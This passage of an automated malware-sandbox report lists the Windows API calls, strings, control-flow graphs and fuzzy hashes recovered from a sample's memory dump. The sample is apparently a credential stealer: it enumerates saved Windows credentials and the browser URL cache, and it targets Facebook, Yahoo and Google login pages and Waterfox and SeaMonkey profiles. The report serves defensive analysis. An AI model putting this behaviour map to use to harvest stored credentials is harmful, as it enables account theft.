                                                                                                                                                                                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                            • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                          • String ID: bhv
                                                                                                                                                                                          • API String ID: 327780389-2689659898
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                          • API String ID: 2941347001-70141382
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2827331108-0
                                                                                                                                                                                          • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                                                          • String ID: visited:
                                                                                                                                                                                          • API String ID: 1157525455-1702587658
                                                                                                                                                                                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 781 40e283-40e286 775->781 776->775 787 40e21b-40e21d 776->787 784 40e291-40e294 call 40aa04 781->784 785 40e288-40e290 ??3@YAXPAX@Z 781->785 784->769 785->784 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                          • API String ID: 3883404497-2982631422
                                                                                                                                                                                          • Opcode ID: f6320f83e9b091826697580f88646c77f053f42bbd7529e7c130ef97409cf436
                                                                                                                                                                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                          • Opcode Fuzzy Hash: f6320f83e9b091826697580f88646c77f053f42bbd7529e7c130ef97409cf436
                                                                                                                                                                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                            • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                          • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                          • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                          • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040BD2B
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 509814883-3916222277
                                                                                                                                                                                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          control_flow_graph 848 41837f-4183bf 849 4183c1-4183cc call 418197 848->849 850 4183dc-4183ec call 418160 848->850 855 4183d2-4183d8 849->855 856 418517-41851d 849->856 857 4183f6-41840b 850->857 858 4183ee-4183f1 850->858 855->850 859 418417-418423 857->859 860 41840d-418415 857->860 858->856 861 418427-418442 call 41739b 859->861 860->861 864 418444-41845d CreateFileW 861->864 865 41845f-418475 CreateFileA 861->865 866 418477-41847c 864->866 865->866 867 4184c2-4184c7 866->867 868 41847e-418495 GetLastError ??3@YAXPAX@Z 866->868 871 4184d5-418501 memset call 418758 867->871 872 4184c9-4184d3 867->872 869 4184b5-4184c0 call 444706 868->869 870 418497-4184b3 call 41837f 868->870 869->856 870->856 876 418506-418515 ??3@YAXPAX@Z 871->876 872->871 876->856
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                          • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFile$??3@ErrorLast
                                                                                                                                                                                          • String ID: |A
                                                                                                                                                                                          • API String ID: 1407640353-1717621600
                                                                                                                                                                                          • Opcode ID: 5aeeff076a9cd849f72a1ec08649adad283ef9ce1d91fa95086884072959f8da
                                                                                                                                                                                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5aeeff076a9cd849f72a1ec08649adad283ef9ce1d91fa95086884072959f8da
                                                                                                                                                                                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                          • String ID: r!A
                                                                                                                                                                                          • API String ID: 2791114272-628097481
                                                                                                                                                                                          • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                          • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                                                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                                                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                          • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                          • API String ID: 62308376-4196376884
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                          • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                          • _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                                                          • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3191383707-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                          • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                          • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                          • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                          • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                          • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                          • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                          • API String ID: 3527940856-11920434
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                          • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                          • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                          • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                          • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                          • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                          • API String ID: 3527940856-2068335096
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                          • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                          • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                          • memset.MSVCRT ref: 00404020
                                                                                                                                                                                          • memset.MSVCRT ref: 00404035
                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
